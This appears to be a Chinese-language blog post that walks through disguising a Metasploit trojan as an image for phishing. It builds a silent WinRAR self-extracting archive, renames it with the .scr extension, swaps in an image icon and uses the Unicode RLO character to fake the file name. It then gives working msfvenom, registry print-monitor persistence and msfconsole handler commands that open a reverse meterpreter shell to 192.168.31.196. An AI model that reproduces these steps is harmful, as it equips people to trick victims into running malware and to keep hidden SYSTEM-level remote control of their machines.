Phishing

2020-08-20 14:56:32 浏览数 (1)

$> 最近来了好多的兄弟,很开心,共同学习,共同进步!


0x01 前言

偶然在YouXbe上看见一个视频:

通过这个软件可以做到图片和木马程序绑定,点击之后图片正常显示,但同时会运行绑定的程序

这就让我很费解啊,有这技术,钓鱼还不要爽翻了?这要买一个这个工具,钓鱼不是起飞了,但是作为一个资深白嫖党,怎么可能会花这个钱呢 ,穷是驱动力,通过翻看这个视频,还真被我找到了其中的端倪。

0x02 揭秘

这个软件本质上实现了两个功能:自解压和更改后缀

  • 自解压

所谓的自解压很简单,例如winrar这类压缩软件除了正常压缩为rar、zip等后缀以外,还可以压缩成exe文件,双击exe文件后,文件会被自动解压,而且通过配置可以做到不展示解压过程、指定解压目录和执行指定的程序

我下载一个jpg文件,用msf生成一个木马 winUpdate.exe,然后使用自解压将其压缩:

在高级中配置自解压选项:

解压路径:

指定程序运行:

隐藏解压过程:

此时会生成desktop.exe,这样双击之后它会自动解压,且会先运行解压到c:windowstemp目录下的1.jpg,然后运行winUpdate.exe。

  • 更改后缀

exe太扎眼了,也不符合视频里的所谓的绑定图片和木马的规矩,Windows里常见的可执行程序后缀有exe、msi、sys等等,还有一个后缀其实一直不太引人注目,就是scr,即屏幕保护程序,所以视频里做的其实就是更改了后缀为scr:

  • 加注

仅仅是这样的话,还是有点low,所以我准备再加几个隐蔽的措施

  • 修改图标

用ResourceHacker可以修改图标,将图片1.jpg转成ico,再使用工具替换原有图标:

由于原始图片有点小,转换后的照片也会比较模糊,用大图片就不会有这个问题

  • Unicode翻转改后缀

Unicode定义的 Start of right-to-left override,控制字符是RLO,ASCII码是0x3F,Windows下可以插入RLO,实现文本倒序

将desktop.scr重命名为如 gpj.scr,在k后面右键点击插入unicode字符,插入RLO

0x03 最后

双击程序上线:

看看解压路径:

0x04 最最后

那么既然msf已经成功上线了,我们肯定想做一下权限维持,让他能够一直上线,所以这里再提一嘴权限维持:

用注册表做开机自启的权限维持已经是老生常谈了,但普遍会在下面两个地方做(或者是HKLM):

  • HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
  • HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunOnce

这里提一个更隐蔽的地方,但是前提是已经是administrator权限:

系统引导期间,各种服务会调用加载各自的DLL,打印机监视器可以通过调用AddMonitor API来设置在启动时加载的DLL。此DLL位于c:windowssystem32中,将由spoolsv.exe,引导。其进程也在系统级权限下运行。

使用MSF生成一个DLL:

代码语言:javascript复制
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.196 lport=4444 -f dll > inj.dll

拿到shell后,通过具有管理员权限的meterpreter会话将生成的DLL注入到c:windowssystem32目录中,然后执行命令:

代码语言:javascript复制
reg add "hklmsystemcurrentcontrolsetcontrolprintmonitorsignite" /v "Driver" /d "inj.dll" /t REG_SZ

测试过程发现会dll上传到sysWow64里,此时移动到system32就行

MSF重新监听:

代码语言:javascript复制
./msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.31.196; set lport 4444; run; "

重启靶机:

上线而且是system权限

0 人点赞